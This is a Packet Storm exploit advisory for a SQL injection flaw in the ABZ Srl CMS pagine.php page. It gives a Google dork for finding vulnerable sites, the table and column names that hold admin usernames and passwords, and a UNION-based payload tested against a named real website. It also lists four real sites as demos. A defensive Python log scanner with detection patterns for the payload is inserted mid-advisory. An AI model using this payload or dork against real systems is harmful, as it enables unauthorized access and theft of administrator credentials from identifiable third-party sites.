ABZ Srl CMS SQL Injection

2014-06-05T00:00:00
ID PACKETSTORM:126952
Type packetstorm
Reporter Medrik
Modified 2014-06-05T00:00:00

Description

[+] Exploit Title: (ABZ Srl) Cms SQL Injection  
[+] Exploit Author: Medrik  
[+] Found Date: 13-03-2014  
[+] Vendor Homepage: http://www.abzsrl.com/  
[+] Google Dork: intext:"powered by ABZ Srl" inurl:pagine.php?id=  
[+] Tested on: Windows  
  
==========================================  
[+] Exploit (Vulnerability Locate):  
  
http://[vulnerable_host]/pagine.php?id=IdNumber[SQLi]  
  
This SQL injection can be exploited with tools such as sqlmap.  
  
  
[*] Important Table : AMMINISTRAZIONE  
  
[*] Important Columns : For User : [ USERN ] & For Password : [ PSWD ]  
  
[*] Example Poc For Database Version : +/*!union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--  
  
[*] Test : http://www.reginanewhouse.com/pagine.php?id=2+/*!union*/+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--  
[*] Response For Test : 5.5.36-34.2-log  
  
[*] Admin Page : /admin [*]  
  
[*] Image : http://i.imgur.com/wNAWyBI.png  
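As an added defender's example (not part of the advisory), the following Python scanner flags access-log requests to pagine.php whose id parameter is not a plain number and carries the markers of the payload shown above (inline-comment UNION, version(), trailing comment terminator). The log lines, hostnames and IP addresses are constructed placeholders.

```python
import re
from urllib.parse import urlparse, parse_qs

# Markers taken from the advisory's payload shape; any one of them is a hit.
MARKERS = [
    re.compile(r"/\*!\s*union\s*\*/", re.I),    # MySQL version-comment hiding UNION
    re.compile(r"\bunion\b.*\bselect\b", re.I),  # plain UNION ... SELECT
    re.compile(r"\bversion\s*\(\s*\)", re.I),    # version() fingerprinting
    re.compile(r"--\s*$|#\s*$"),                 # trailing SQL comment
]

# Request line of an Apache/Nginx combined-format log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_id(target):
    """Return (decoded_id, matched_patterns) for a pagine.php request, or None if clean."""
    url = urlparse(target)
    if not url.path.endswith("/pagine.php"):
        return None
    # parse_qs already decodes %xx escapes and turns '+' into spaces.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if value.isdigit():          # the only legitimate shape for this parameter
            continue
        hits = [m.pattern for m in MARKERS if m.search(value)]
        return value, hits           # a non-numeric id is reportable even with no marker
    return None

def scan(log_lines):
    """Return a list of (client_ip, decoded_id, matched_patterns) for flagged requests."""
    findings = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        result = suspicious_id(m.group("target"))
        if result:
            findings.append((line.split()[0], *result))
    return findings

# Constructed sample log lines (combined format); IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Mar/2014:10:01:02 +0100] "GET /pagine.php?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [13/Mar/2014:10:01:09 +0100] "GET /pagine.php?id=2+/*!union*/+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- HTTP/1.1" 200 5301 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Mar/2014:10:02:00 +0100] "GET /index.php HTTP/1.1" 200 800 "-" "curl/7.35"',
]

if __name__ == "__main__":
    for ip, value, hits in scan(SAMPLE_LOG):
        print(f"{ip} sent non-numeric id={value!r} ({len(hits)} injection markers)")
```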
  
==========================================  
  
[+] Demo(s) :  
  
(#) http://www.reginanewhouse.com/pagine.php?id=2[SQLi]  
(#) http://www.gruppo-ria.com/pagine.php?id=2[SQLi]  
(#) http://www.euroxoro-torino.it/pagine.php?id=7[SQLi]  
(#) http://www.dimsegnaletica.com/pagine.php?id=4[SQLi]  
  
==========================================  
  
[+] Gr33tz :  
  
R33VES , Enddo , Beni_Vanda , Explo!ter , Black.KinG , M.R.S.CO , MR.0x41 , Dr.3v1l  
  
==========================================  